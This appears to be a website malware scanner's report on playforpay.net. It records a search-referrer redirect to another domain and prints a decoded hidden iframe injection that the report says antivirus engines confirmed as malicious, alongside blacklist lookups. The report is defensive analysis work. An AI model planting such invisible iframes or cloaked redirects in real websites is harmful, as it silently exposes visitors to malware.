Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://playforpay.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: playforpay.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 28 Aug 2014 09:29:53 GMT Location: http://ifchepa.com/images/img.php Server: Apache Vary: Accept-Encoding Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://playforpay.net/ | 200 OK Content-Length: 6123 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Decoded script: <iframe src='http://subcosi.com/count2.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Antivirus reports:
http://isante.ma/facebook.php | 500 Can't connect to isante.ma:80 (Bad hostname) Content-Length: 150 Content-Type: text/plain | clean |
http://isante.ma/test404page.js | 500 Can't connect to isante.ma:80 (Bad hostname) Content-Length: 150 Content-Type: text/plain | clean |
http://przejrzystaoswiata.pl/js.php | 500 Can't connect to przejrzystaoswiata.pl:80 (Bad hostname) Content-Length: 174 Content-Type: text/plain | clean |
http://24onlinedrug.com/search.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://w3rocks.com/swfobject.js | 404 Not Found Content-Length: 7761 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=playforpay.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://playforpay.net/
Result: playforpay.net is not infected or malware details are not published yet.